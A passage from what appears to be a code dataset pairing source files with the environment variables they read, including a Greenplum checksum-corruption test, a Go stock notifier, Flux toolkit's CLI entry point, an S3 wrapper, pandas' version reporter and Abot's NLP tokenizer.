f.seek(char_location,corruption_start)
if (f.read(1) == corruption_char):
corruption_offset=char_location
write_char=CONST.FIND_CHAR.upper()
verify_sql='count_appendonly_verify_block_checksums_co_on'
break
f.seek(corruption_offset,corruption_start)
f.write(write_char)
except IOError as e:
errmsg="I/O error({0}): {1}".format(e.errno, e.strerror)
tinctest.logger.info("%s" % errmsg)
except:
errmsg = "Unexpected error:", sys.exc_info()[0]
tinctest.logger.info("%s" % errmsg)
raise
f.close()
self.select_table(verify_sql,noncorrupted_checksum=False)
if corruption_char == 'a':
self.select_table('count_appendonly_verify_block_checksums_co_off',noncorrupted_checksum=True)
'''Replace the corrupted data file with the good one from backup taken earlier'''
cmd = "cp -f "+ data_file+".bak " + data_file
tinctest.logger.info("Restore data-file from backup : %s" % cmd)
Command("Restore data-file", cmd).run(validateAfter=True)
self.select_table(verify_sql,noncorrupted_checksum=True)
@tinctest.dataProvider('data_provider_for_checksum_corruption')
def test_data_provider_for_checksum_corruption():
data = {
"chksum_on_corrupt_header_largecontent_co":['chksum_on_corrupt_header_large_co',CONST.BOF,CONST.HEADER_OFFSET],
"chksum_on_corrupt_content_largecontent_co":['chksum_on_corrupt_header_large_co',CONST.EOF,CONST.DATA_OFFSET],
"chksum_on_corrupt_header_smallcontent_co":['chksum_on_header_sml_co',CONST.BOF,CONST.HEADER_OFFSET],
"chksum_on_corrupt_content_smallcontent_co":['chksum_on_header_sml_co',CONST.EOF,CONST.DATA_OFFSET],
"chksum_on_corrupt_header_smallcontent_ao":['chksum_on_header_sml_ao',CONST.BOF,CONST.HEADER_OFFSET],
"chksum_on_corrupt_content_smallcontent_ao":['chksum_on_header_sml_ao',CONST.EOF,CONST.DATA_OFFSET],
"appendonly_verify_block_checksums_co":['appendonly_verify_block_checksums_co',CONST.EOF,CONST.FIND_CHAR]
}
return data
|
[] |
[] |
[
"PGDATABASE"
] |
[]
|
["PGDATABASE"]
|
python
| 1 | 0 | |
internal/handler/hook_handler.go
|
package handler
import (
"log"
"net/http"
"os"
"regexp"
"strings"
"github.com/PuerkitoBio/goquery"
"github.com/t1732/inventory-notification/internal/notifier"
)
func HookHandler(w http.ResponseWriter, r *http.Request) {
log.Print("hookHandler call")
targetUrl := os.Getenv("TARGET_URL")
if targetUrl == "" {
log.Printf("target URL empty.")
return
}
log.Printf(targetUrl)
client := &http.Client{}
req, err := http.NewRequest("GET", targetUrl, nil)
if err != nil {
log.Fatalln(err)
}
userAgent := os.Getenv("USER_AGENT")
if userAgent == "" {
userAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
}
req.Header.Set("User-Agent", userAgent)
res, err := client.Do(req)
if err != nil {
log.Fatalln(err)
}
defer res.Body.Close()
doc, err := goquery.NewDocumentFromReader(res.Body)
if err != nil {
log.Fatal(err)
return
}
force := r.FormValue("ping") == "true"
if !force {
title := doc.Find("title").Text()
log.Printf(title)
availability := doc.Find("#availability").Text()
availability = strings.TrimSpace(availability)
log.Printf(availability)
r := regexp.MustCompile(`お取り扱いできません`)
if r.MatchString(availability) {
log.Printf("在庫なし")
return
}
merchantInfo := doc.Find("#merchant-info").Text()
merchantInfo = strings.TrimSpace(merchantInfo)
log.Printf("merchantInfo: %s", merchantInfo)
r = regexp.MustCompile(`Amazon\.co\.jp`)
if !r.MatchString(merchantInfo) {
log.Printf("Amazon 出品ではない")
return
}
}
n, err := notifier.New()
if err != nil {
log.Fatal(err)
w.WriteHeader(500)
return
}
texts := []string{"在庫が復活したかもしれません", targetUrl}
if _, err = n.BroadcastMessage(texts).Do(); err != nil {
log.Fatal(err)
}
}
|
[
"\"TARGET_URL\"",
"\"USER_AGENT\""
] |
[] |
[
"TARGET_URL",
"USER_AGENT"
] |
[]
|
["TARGET_URL", "USER_AGENT"]
|
go
| 2 | 0 | |
terraform/azurerm/vendor/github.com/hashicorp/terraform-provider-azurerm/internal/services/databoxedge/validate/databox_edge_contact_name.go
|
package validate
import (
"fmt"
"regexp"
)
func DataboxEdgeContactName(v interface{}, k string) (warnings []string, errors []error) {
value := v.(string)
if !regexp.MustCompile(`^[\s\S]{3,34}$`).MatchString(value) {
errors = append(errors, fmt.Errorf("%q must be between 3 and 34 characters in length", k))
}
return warnings, errors
}
|
[] |
[] |
[] |
[]
|
[]
|
go
| null | null | null |
cmd/tk/main.go
|
/*
Copyright 2020 The Flux CD contributors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"log"
"os"
"path/filepath"
"time"
"github.com/spf13/cobra"
"github.com/spf13/cobra/doc"
_ "k8s.io/client-go/plugin/pkg/client/auth"
tklog "github.com/fluxcd/toolkit/pkg/log"
)
var VERSION = "0.0.0-dev.0"
var rootCmd = &cobra.Command{
Use: "tk",
Version: VERSION,
SilenceUsage: true,
SilenceErrors: true,
Short: "Command line utility for assembling Kubernetes CD pipelines",
Long: `Command line utility for assembling Kubernetes CD pipelines the GitOps way.`,
Example: ` # Check prerequisites
tk check --pre
# Install the latest version of the toolkit
tk install --version=master
# Create a source from a public Git repository
tk create source git webapp-latest \
--url=https://github.com/stefanprodan/podinfo \
--branch=master \
--interval=3m
# List GitRepository sources and their status
tk get sources git
# Trigger a GitRepository source reconciliation
tk reconcile source git gitops-system
# Export GitRepository sources in YAML format
tk export source git --all > sources.yaml
# Create a Kustomization for deploying a series of microservices
tk create kustomization webapp-dev \
--source=webapp-latest \
--path="./deploy/webapp/" \
--prune=true \
--interval=5m \
--validation=client \
--health-check="Deployment/backend.webapp" \
--health-check="Deployment/frontend.webapp" \
--health-check-timeout=2m
# Trigger a git sync of the Kustomization's source and apply changes
tk reconcile kustomization webapp-dev --with-source
# Suspend a Kustomization reconciliation
tk suspend kustomization webapp-dev
# Export Kustomizations in YAML format
tk export kustomization --all > kustomizations.yaml
# Resume a Kustomization reconciliation
tk resume kustomization webapp-dev
# Delete a Kustomization
tk delete kustomization webapp-dev
# Delete a GitRepository source
tk delete source git webapp-latest
# Uninstall the toolkit and delete CRDs
tk uninstall --crds
`,
}
var (
kubeconfig string
namespace string
timeout time.Duration
verbose bool
utils Utils
pollInterval = 2 * time.Second
logger tklog.Logger = printLogger{}
)
var (
defaultComponents = []string{"source-controller", "kustomize-controller", "helm-controller", "notification-controller"}
defaultVersion = "latest"
defaultNamespace = "gitops-system"
defaultNotification = "notification-controller"
)
func init() {
rootCmd.PersistentFlags().StringVar(&namespace, "namespace", defaultNamespace,
"the namespace scope for this operation")
rootCmd.PersistentFlags().DurationVarP(&timeout, "timeout", "", 5*time.Minute,
"timeout for this operation")
rootCmd.PersistentFlags().BoolVarP(&verbose, "verbose", "", false,
"print generated objects")
}
func main() {
log.SetFlags(0)
generateDocs()
kubeconfigFlag()
if err := rootCmd.Execute(); err != nil {
logger.Failuref("%v", err)
os.Exit(1)
}
}
func kubeconfigFlag() {
if home := homeDir(); home != "" {
rootCmd.PersistentFlags().StringVarP(&kubeconfig, "kubeconfig", "", filepath.Join(home, ".kube", "config"),
"path to the kubeconfig file")
} else {
rootCmd.PersistentFlags().StringVarP(&kubeconfig, "kubeconfig", "", "",
"absolute path to the kubeconfig file")
}
if len(os.Getenv("KUBECONFIG")) > 0 {
kubeconfig = os.Getenv("KUBECONFIG")
}
}
func generateDocs() {
args := os.Args[1:]
if len(args) > 0 && args[0] == "docgen" {
rootCmd.PersistentFlags().StringVarP(&kubeconfig, "kubeconfig", "", "~/.kube/config",
"path to the kubeconfig file")
rootCmd.DisableAutoGenTag = true
err := doc.GenMarkdownTree(rootCmd, "./docs/cmd")
if err != nil {
log.Fatal(err)
}
os.Exit(0)
}
}
func homeDir() string {
if h := os.Getenv("HOME"); h != "" {
return h
}
return os.Getenv("USERPROFILE") // windows
}
|
[
"\"KUBECONFIG\"",
"\"KUBECONFIG\"",
"\"HOME\"",
"\"USERPROFILE\""
] |
[] |
[
"HOME",
"USERPROFILE",
"KUBECONFIG"
] |
[]
|
["HOME", "USERPROFILE", "KUBECONFIG"]
|
go
| 3 | 0 | |
tests/library/compile_python_modules.py
|
#!/usr/bin/env python
# Copyright 2021, Kay Hayen, mailto:[email protected]
#
# Python test originally created or extracted from other peoples work. The
# parts from me are licensed as below. It is at least Free Software where
# it's copied from other people. In these cases, that will normally be
# indicated.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" This test runner compiles all Python files as a module.
This is a test to achieve some coverage, it will only find assertions of
within Nuitka or warnings from the C compiler. Code will not be run
normally.
"""
import os
import sys
# Find nuitka package relative to us.
sys.path.insert(
0,
os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "..")
),
)
# isort:start
import subprocess
import tempfile
from nuitka.tools.testing.Common import (
checkCompilesNotWithCPython,
compileLibraryTest,
createSearchMode,
getPythonArch,
getPythonVendor,
my_print,
setup,
)
from nuitka.utils.Importing import getSharedLibrarySuffix
python_version = setup(suite="python_modules", needs_io_encoding=True)
python_vendor = getPythonVendor()
python_arch = getPythonArch()
search_mode = createSearchMode()
tmp_dir = tempfile.gettempdir()
# Try to avoid RAM disk /tmp and use the disk one instead.
if tmp_dir == "/tmp" and os.path.exists("/var/tmp"):
tmp_dir = "/var/tmp"
ignore_list = (
"__phello__.foo.py", # Triggers error for "." in module name
"idnadata", # Avoid too complex code for main program.
"joined_strings.py",
# Incredible amount of memory in C compiler for test code
"test_spin.py",
# Uses outside modules up the chain
"cheshire_tomography.py",
)
nosyntax_errors = (
# No syntax error with Python2 compileall, but run time only:
"_identifier.py",
"bench.py",
"_tweedie_compound_poisson.py",
"session.py",
)
def decide(_root, filename):
return (
filename.endswith(".py")
and filename not in ignore_list
and "(" not in filename
and filename.count(".") == 1
)
def action(stage_dir, _root, path):
command = [
sys.executable,
os.path.join("..", "..", "bin", "nuitka"),
"--module",
"--output-dir",
stage_dir,
"--remove-output",
"--plugin-enable=pylint-warnings",
]
command += os.environ.get("NUITKA_EXTRA_OPTIONS", "").split()
command.append(path)
try:
subprocess.check_call(command)
except subprocess.CalledProcessError:
if os.path.basename(path) in nosyntax_errors:
my_print("Syntax error is known unreliable with file file.")
else:
my_print("Falling back to full comparison due to error exit.")
checkCompilesNotWithCPython(
dirname=None, filename=path, search_mode=search_mode
)
else:
my_print("OK")
suffix = getSharedLibrarySuffix(preferred=True)
target_filename = os.path.basename(path)[:-3] + suffix
target_filename = target_filename.replace("(", "").replace(")", "")
os.unlink(os.path.join(stage_dir, target_filename))
compileLibraryTest(
search_mode=search_mode,
stage_dir=os.path.join(
tmp_dir,
"compile_library_%s-%s-%s"
% (".".join(python_version), python_arch, python_vendor),
),
decide=decide,
action=action,
)
search_mode.finish()
|
[] |
[] |
[
"NUITKA_EXTRA_OPTIONS"
] |
[]
|
["NUITKA_EXTRA_OPTIONS"]
|
python
| 1 | 0 | |
healthchecks.py
|
import requests
import os
import time
API_KEY = os.getenv("HEALTH_BOT_API")
ID = os.getenv("GROUP_ID")
MSG = ""
url = 'https://api.telegram.org/bot' + API_KEY + \
'/sendMessage?chat_id=' + ID + '&parse_mode=Markdown&text='
while True:
# Funny Telegram Bot
try:
requests.get(
"https://hc-ping.com/17445703-16bb-402f-9632-c32ec7f9421d", timeout=30)
MSG += "🟢 FUNNY BOT\n\n"
except:
MSG += "🔴 FUNNY BOT\n\n"
requests.get(url=(url+MSG))
MSG = ""
time.sleep(3600)
|
[] |
[] |
[
"HEALTH_BOT_API",
"GROUP_ID"
] |
[]
|
["HEALTH_BOT_API", "GROUP_ID"]
|
python
| 2 | 0 | |
reproserver/objectstore.py
|
import asyncio
import boto3
from botocore.client import Config
import botocore.exceptions
import io
import logging
import os
logger = logging.getLogger(__name__)
def get_object_store():
logger.info("Logging in to S3")
return ObjectStore(
os.environ['S3_URL'],
os.environ['S3_CLIENT_URL'],
os.environ['S3_BUCKET_PREFIX'],
)
class ObjectStore(object):
def __init__(self, endpoint_url, client_endpoint_url, bucket_prefix):
self.s3 = boto3.resource(
's3', endpoint_url=endpoint_url,
aws_access_key_id=os.environ['S3_KEY'],
aws_secret_access_key=os.environ['S3_SECRET'],
region_name='us-east-1',
config=Config(signature_version='s3v4'),
)
self.s3_client = boto3.resource(
's3', endpoint_url=client_endpoint_url,
aws_access_key_id=os.environ['S3_KEY'],
aws_secret_access_key=os.environ['S3_SECRET'],
region_name='us-east-1',
config=Config(signature_version='s3v4'),
)
self.bucket_prefix = bucket_prefix
def bucket_name(self, name):
if name not in ('experiments', 'inputs', 'outputs'):
raise ValueError("Invalid bucket name %s" % name)
name = '%s%s' % (self.bucket_prefix, name)
return name
def bucket(self, name):
return self.s3.Bucket(self.bucket_name(name))
def download_file(self, bucket, objectname, filename):
self.bucket(bucket).download_file(objectname, filename)
def upload_fileobj(self, bucket, objectname, fileobj):
# s3.Object(...).put(...) and s3.meta.client.upload_file(...) do
# multipart uploads which don't work on GCP
self.s3.meta.client.put_object(
Bucket=self.bucket_name(bucket),
Key=objectname,
Body=fileobj,
)
def upload_file(self, bucket, objectname, filename):
with open(filename, 'rb') as fileobj:
self.upload_fileobj(bucket, objectname, fileobj)
def upload_file_async(self, bucket, objectname, filename):
return asyncio.get_event_loop().run_in_executor(
None,
self.upload_file,
bucket, objectname, filename,
)
def upload_bytes(self, bucket, objectname, bytestr):
self.upload_fileobj(bucket, objectname, io.BytesIO(bytestr))
def upload_bytes_async(self, bucket, objectname, bytestr):
return asyncio.get_event_loop().run_in_executor(
None,
self.upload_bytes,
bucket, objectname, bytestr,
)
def create_buckets(self):
missing = []
for name in ('experiments', 'inputs', 'outputs'):
name = self.bucket_name(name)
try:
self.s3.meta.client.head_bucket(Bucket=name)
except botocore.exceptions.ClientError:
missing.append(name)
if missing:
logger.info("The buckets don't seem to exist; creating %s",
", ".join(missing))
for name in missing:
self.s3.create_bucket(Bucket=name)
def presigned_serve_url(self, bucket, objectname, filename, mime=None):
return self.s3_client.meta.client.generate_presigned_url(
ClientMethod='get_object',
Params={'Bucket': self.bucket_name(bucket),
'Key': objectname,
'ResponseContentType': mime or 'application/octet-stream',
'ResponseContentDisposition': 'inline; filename=%s' %
filename},
)
|
[] |
[] |
[
"S3_BUCKET_PREFIX",
"S3_URL",
"S3_KEY",
"S3_SECRET",
"S3_CLIENT_URL"
] |
[]
|
["S3_BUCKET_PREFIX", "S3_URL", "S3_KEY", "S3_SECRET", "S3_CLIENT_URL"]
|
python
| 5 | 0 | |
pandas/util/_print_versions.py
|
import os
import platform
import sys
import struct
import subprocess
import codecs
import locale
import importlib
def get_sys_info():
"Returns system information as a dict"
blob = []
# get full commit hash
commit = None
if os.path.isdir(".git") and os.path.isdir("pandas"):
try:
pipe = subprocess.Popen('git log --format="%H" -n 1'.split(" "),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
so, serr = pipe.communicate()
except (OSError, ValueError):
pass
else:
if pipe.returncode == 0:
commit = so
try:
commit = so.decode('utf-8')
except ValueError:
pass
commit = commit.strip().strip('"')
blob.append(('commit', commit))
try:
(sysname, nodename, release,
version, machine, processor) = platform.uname()
blob.extend([
("python", '.'.join(map(str, sys.version_info))),
("python-bits", struct.calcsize("P") * 8),
("OS", "{sysname}".format(sysname=sysname)),
("OS-release", "{release}".format(release=release)),
# ("Version", "{version}".format(version=version)),
("machine", "{machine}".format(machine=machine)),
("processor", "{processor}".format(processor=processor)),
("byteorder", "{byteorder}".format(byteorder=sys.byteorder)),
("LC_ALL", "{lc}".format(lc=os.environ.get('LC_ALL', "None"))),
("LANG", "{lang}".format(lang=os.environ.get('LANG', "None"))),
("LOCALE", '.'.join(map(str, locale.getlocale()))),
])
except (KeyError, ValueError):
pass
return blob
def show_versions(as_json=False):
sys_info = get_sys_info()
deps = [
# (MODULE_NAME, f(mod) -> mod version)
("pandas", lambda mod: mod.__version__),
("pytest", lambda mod: mod.__version__),
("pip", lambda mod: mod.__version__),
("setuptools", lambda mod: mod.__version__),
("Cython", lambda mod: mod.__version__),
("numpy", lambda mod: mod.version.version),
("scipy", lambda mod: mod.version.version),
("pyarrow", lambda mod: mod.__version__),
("xarray", lambda mod: mod.__version__),
("IPython", lambda mod: mod.__version__),
("sphinx", lambda mod: mod.__version__),
("patsy", lambda mod: mod.__version__),
("dateutil", lambda mod: mod.__version__),
("pytz", lambda mod: mod.VERSION),
("blosc", lambda mod: mod.__version__),
("bottleneck", lambda mod: mod.__version__),
("tables", lambda mod: mod.__version__),
("numexpr", lambda mod: mod.__version__),
("feather", lambda mod: mod.__version__),
("matplotlib", lambda mod: mod.__version__),
("openpyxl", lambda mod: mod.__version__),
("xlrd", lambda mod: mod.__VERSION__),
("xlwt", lambda mod: mod.__VERSION__),
("xlsxwriter", lambda mod: mod.__version__),
("lxml", lambda mod: mod.etree.__version__),
("bs4", lambda mod: mod.__version__),
("html5lib", lambda mod: mod.__version__),
("sqlalchemy", lambda mod: mod.__version__),
("pymysql", lambda mod: mod.__version__),
("psycopg2", lambda mod: mod.__version__),
("jinja2", lambda mod: mod.__version__),
("s3fs", lambda mod: mod.__version__),
("fastparquet", lambda mod: mod.__version__),
("pandas_gbq", lambda mod: mod.__version__),
("pandas_datareader", lambda mod: mod.__version__),
("gcsfs", lambda mod: mod.__version__),
]
deps_blob = list()
for (modname, ver_f) in deps:
try:
if modname in sys.modules:
mod = sys.modules[modname]
else:
mod = importlib.import_module(modname)
ver = ver_f(mod)
deps_blob.append((modname, ver))
except ImportError:
deps_blob.append((modname, None))
if (as_json):
try:
import json
except ImportError:
import simplejson as json
j = dict(system=dict(sys_info), dependencies=dict(deps_blob))
if as_json is True:
print(j)
else:
with codecs.open(as_json, "wb", encoding='utf8') as f:
json.dump(j, f, indent=2)
else:
print("\nINSTALLED VERSIONS")
print("------------------")
for k, stat in sys_info:
print("{k}: {stat}".format(k=k, stat=stat))
print("")
for k, stat in deps_blob:
print("{k}: {stat}".format(k=k, stat=stat))
def main():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-j", "--json", metavar="FILE", nargs=1,
help="Save output as JSON into file, pass in "
"'-' to output to stdout")
(options, args) = parser.parse_args()
if options.json == "-":
options.json = True
show_versions(as_json=options.json)
return 0
if __name__ == "__main__":
sys.exit(main())
|
[] |
[] |
[
"LC_ALL",
"LANG"
] |
[]
|
["LC_ALL", "LANG"]
|
python
| 2 | 0 | |
cmd/go_func.go
|
package main
import (
"flag"
"os"
"fmt"
"strings"
"github.com/chris-tomich/go-func/template"
)
func main() {
//TODO: Develop a version that looks at the line of the go generate argument and, if no type is given, look at the following line in code.
singularType := flag.String("singular", "[]interface{}", "This is the name of the type contained within the collection.")
collectionType := flag.String("collection", "[]interface{}", "This is the name of the type to extend with map/filter/reduce functionality.")
flag.Parse()
// The package name will be the package declared at the top of this file. For example, in this file it would be "main".
// It does not include the full package location.
packageName := os.Getenv("GOPACKAGE")
fileName := os.Getenv("GOFILE")
extIndex := strings.Index(fileName, ".go")
if extIndex >= 0 {
fileName = fileName[:extIndex]
}
fileName = fileName + "_" + strings.ToLower(*collectionType) + "_generated.go"
replacer := strings.NewReplacer(template.PackageToken, packageName, template.SingularTypeToken, *singularType, template.CollectionTypeToken, *collectionType)
fd, fileOpenErr := os.Create(fileName)
if fileOpenErr != nil {
panic(fileOpenErr)
}
n, fileWriteErr := replacer.WriteString(fd, template.BaseTemplate)
if fileWriteErr != nil {
panic(fileWriteErr)
}
fmt.Printf("%d total replacements made.\n", n)
}
|
[
"\"GOPACKAGE\"",
"\"GOFILE\""
] |
[] |
[
"GOFILE",
"GOPACKAGE"
] |
[]
|
["GOFILE", "GOPACKAGE"]
|
go
| 2 | 0 | |
core/nlp.go
|
package core
import (
"bufio"
"fmt"
"math/rand"
"os"
"path/filepath"
"strings"
"github.com/dchest/stemmer/porter2"
"github.com/itsabot/abot/core/log"
"github.com/itsabot/abot/shared/datatypes"
"github.com/itsabot/abot/shared/helpers/timeparse"
)
// classifier is a set of common english word stems unique among their
// Structured Input Types. This enables extremely fast constant-time O(1)
// lookups of stems to their SITs with high accuracy and no training
// requirements. It consumes just a few MB in memory.
type classifier map[string]struct{}
// classifyTokens builds a StructuredInput from a tokenized sentence.
func (c classifier) classifyTokens(tokens []string) *dt.StructuredInput {
var s dt.StructuredInput
var sections []string
for _, t := range tokens {
var found bool
lower := strings.ToLower(t)
_, exists := c["C"+lower]
if exists {
s.Commands = append(s.Commands, lower)
found = true
}
_, exists = c["O"+lower]
if exists {
s.Objects = append(s.Objects, lower)
found = true
}
// Identify the sex of any people being discussed.
var sex dt.Sex
_, exists = c["PM"+lower]
if exists {
_, exists = c["PF"+lower]
if exists {
sex = dt.SexEither
} else {
sex = dt.SexMale
}
person := dt.Person{
Name: t,
Sex: sex,
}
s.People = append(s.People, person)
found = true
}
// If we haven't found a male or male+female name yet, check
// for female.
if sex == dt.SexInvalid {
_, exists = c["PF"+lower]
if exists {
person := dt.Person{
Name: t,
Sex: dt.SexFemale,
}
s.People = append(s.People, person)
found = true
}
}
// Each time we find an object, add a separator to sections,
// enabling us to check for times only along continuous
// stretches of a sentence (i.e. a single time won't appear on
// either side of the word "Jim" or "Bring")
if found || len(sections) == 0 {
sections = append(sections, t)
} else {
switch t {
case ".", ",", ";", "?", "-", "_", "=", "+", "#", "@",
"!", "$", "%", "^", "&", "*", "(", ")", "'":
continue
}
sections[len(sections)-1] += " " + t
}
}
for _, sec := range sections {
if len(sec) == 0 {
continue
}
s.Times = append(s.Times, timeparse.Parse(sec)...)
}
return &s
}
// buildClassifier prepares the Named Entity Recognizer (NER) to find Commands
// and Objects using a simple dictionary lookup. This has the benefit of high
// speed--constant time, O(1)--with insignificant memory use and high accuracy
// given false positives (marking something as both a Command and an Object when
// it's really acting as an Object) are OK. Ultimately this should be a first
// pass, and any double-marked words should be passed through something like an
// n-gram Bayesian filter to determine the correct part of speech within its
// context in the sentence.
func buildClassifier() (classifier, error) {
ner := classifier{}
var p string
if os.Getenv("ABOT_ENV") == "test" {
p = filepath.Join(os.Getenv("ABOT_PATH"), "base", "data",
"ner")
} else {
p = filepath.Join("data", "ner")
}
fi, err := os.Open(filepath.Join(p, "nouns.txt"))
if err != nil {
return ner, err
}
scanner := bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["O"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
fi, err = os.Open(filepath.Join(p, "verbs.txt"))
if err != nil {
return ner, err
}
scanner = bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["C"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
fi, err = os.Open(filepath.Join(p, "adjectives.txt"))
if err != nil {
return ner, err
}
scanner = bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["O"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
fi, err = os.Open(filepath.Join(p, "adverbs.txt"))
if err != nil {
return ner, err
}
scanner = bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["O"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
fi, err = os.Open(filepath.Join(p, "names_female.txt"))
if err != nil {
return ner, err
}
scanner = bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["PF"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
fi, err = os.Open(filepath.Join(p, "names_male.txt"))
if err != nil {
return ner, err
}
scanner = bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["PM"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
return ner, nil
}
// buildOffensiveMap creates a map of offensive terms for which Abot will refuse
// to respond. This helps ensure that users are somewhat respectful to Abot and
// her human trainers, since sentences caught by the OffensiveMap are rejected
// before any human ever sees them.
func buildOffensiveMap() (map[string]struct{}, error) {
o := map[string]struct{}{}
p := filepath.Join("data", "offensive.txt")
fi, err := os.Open(p)
if err != nil {
return o, err
}
scanner := bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
o[scanner.Text()] = struct{}{}
}
err = fi.Close()
return o, err
}
// RespondWithNicety replies to niceties that humans use, but Abot can ignore.
// Words like "Thank you" are not necessary for a robot, but it's important Abot
// respond correctly nonetheless.
func RespondWithNicety(in *dt.Msg) string {
for _, w := range in.Stems {
// Since these are stems, some of them look incorrectly spelled.
// Needless to say, these are the correct Porter2 Snowball stems
switch w {
case "thank":
return "You're welcome!"
case "cool", "sweet", "awesom", "neat", "perfect":
return "I know!"
case "sorri":
return "That's OK. I forgive you."
case "hi", "hello":
return "Hi there. :)"
}
}
return ""
}
// RespondWithHelp replies to the user when he or she asks for "help".
func RespondWithHelp(in *dt.Msg) string {
if len(in.StructuredInput.Commands) != 1 {
return ""
}
if in.StructuredInput.Commands[0] != "help" {
return ""
}
if in.Plugin != nil {
use := randUseForPlugin(in.Plugin)
use2 := randUseForPlugin(in.Plugin)
if use == use2 {
return fmt.Sprintf("Try telling me %q", use)
}
return fmt.Sprintf("Try telling me %q or %q", use, use2)
}
switch len(PluginsGo) {
case 0:
return ""
case 1:
return fmt.Sprintf("Try saying %q", randUse())
default:
use := randUse()
use2 := randUse()
if use == use2 {
return fmt.Sprintf("Try telling me %q", use)
}
return fmt.Sprintf("Try telling me %q or %q", use, use2)
}
}
// RespondWithHelpConfused replies to the user when Abot is confused.
func RespondWithHelpConfused(in *dt.Msg) string {
if in.Plugin != nil {
use := randUseForPlugin(in.Plugin)
use2 := randUseForPlugin(in.Plugin)
if use == use2 {
return fmt.Sprintf("%s You can try telling me %q",
ConfusedLang(), use)
}
return fmt.Sprintf("%s You can try telling me %q or %q",
ConfusedLang(), use, use2)
}
if len(PluginsGo) == 0 {
return ConfusedLang()
}
use := randUse()
use2 := randUse()
if use == use2 {
return fmt.Sprintf("%s How about %q", ConfusedLang(), use)
}
return fmt.Sprintf("%s How about %q or %q", ConfusedLang(), use, use2)
}
// randUse returns a random use from among all plugins.
func randUse() string {
if len(PluginsGo) == 0 {
return ""
}
pluginUses := PluginsGo[rand.Intn(len(PluginsGo))].Usage
if pluginUses == nil || len(pluginUses) == 0 {
return ""
}
return pluginUses[rand.Intn(len(pluginUses))]
}
// randUseForPlugin returns a random use from a specific plugin.
func randUseForPlugin(plugin *dt.Plugin) string {
if plugin.Config.Usage == nil {
return ""
}
return plugin.Config.Usage[rand.Intn(len(plugin.Config.Usage))]
}
// RespondWithOffense is a one-off function to respond to rude user language by
// refusing to process the command.
func RespondWithOffense(in *dt.Msg) string {
for _, w := range in.Stems {
_, ok := offensive[w]
if ok {
return "I'm sorry, but I don't respond to rude language."
}
}
return ""
}
// ConfusedLang returns a randomized response signalling that Abot is confused
// or could not understand the user's request.
func ConfusedLang() string {
n := rand.Intn(4)
switch n {
case 0:
return "I'm not sure I understand you."
case 1:
return "I'm sorry, I don't understand that."
case 2:
return "Uh, what are you telling me to do?"
case 3:
return "What should I do?"
}
log.Debug("confused failed to return a response")
return ""
}
// TokenizeSentence returns a sentence broken into tokens. Tokens are individual
// words as well as punctuation. For example, "Hi! How are you?" becomes
// []string{"Hi", "!", "How", "are", "you", "?"}. This also expands
// contractions into the words they represent, e.g. "How're you?" becomes
// []string{"How", "'", "are", "you", "?"}.
func TokenizeSentence(sent string) []string {
tokens := []string{}
for _, w := range strings.Fields(sent) {
found := []int{}
for i, r := range w {
switch r {
case '\'', '"', ':', ';', '!', '?':
found = append(found, i)
// Handle case of currencies and fractional percents.
case '.', ',':
if i+1 < len(w) {
switch w[i+1] {
case '0', '1', '2', '3', '4', '5', '6', '7', '8', '9':
continue
}
}
found = append(found, i)
i++
}
}
if len(found) == 0 {
tokens = append(tokens, w)
continue
}
for i, j := range found {
// If the token marker is not the first character in the
// sentence, then include all characters leading up to
// the prior found token.
if j > 0 {
if i == 0 {
tokens = append(tokens, w[:j])
} else if i-1 < len(found) {
// Handle case where multiple tokens are
// found in the same word.
tokens = append(tokens, w[found[i-1]+1:j])
}
}
// Append the token marker itself
tokens = append(tokens, string(w[j]))
// If we're on the last token marker, append all
// remaining parts of the word.
if i+1 == len(found) {
tokens = append(tokens, w[j+1:])
}
}
}
// Expand contractions. This isn't perfect and doesn't need to be to
// fulfill its purpose, which is fundamentally making it easier to find
// times in a sentence containing contractions.
for i, t := range tokens {
switch t {
case "s":
tokens[i] = "is"
case "re":
tokens[i] = "are"
case "m":
tokens[i] = "am"
case "t":
tokens[i] = "not"
case "ve":
tokens[i] = "have"
case "ll":
tokens[i] = "will"
case "d":
tokens[i] = "would"
}
}
log.Debug("found tokens", tokens)
return tokens
}
// StemTokens returns the porter2 (snowball) stems for each token passed into
// it.
func StemTokens(tokens []string) []string {
eng := porter2.Stemmer
stems := []string{}
for _, w := range tokens {
if len(w) == 1 {
switch w {
case "'", "\"", ",", ".", ":", ";", "!", "?":
continue
}
}
w = strings.ToLower(w)
stems = append(stems, eng.Stem(w))
}
return stems
}
|
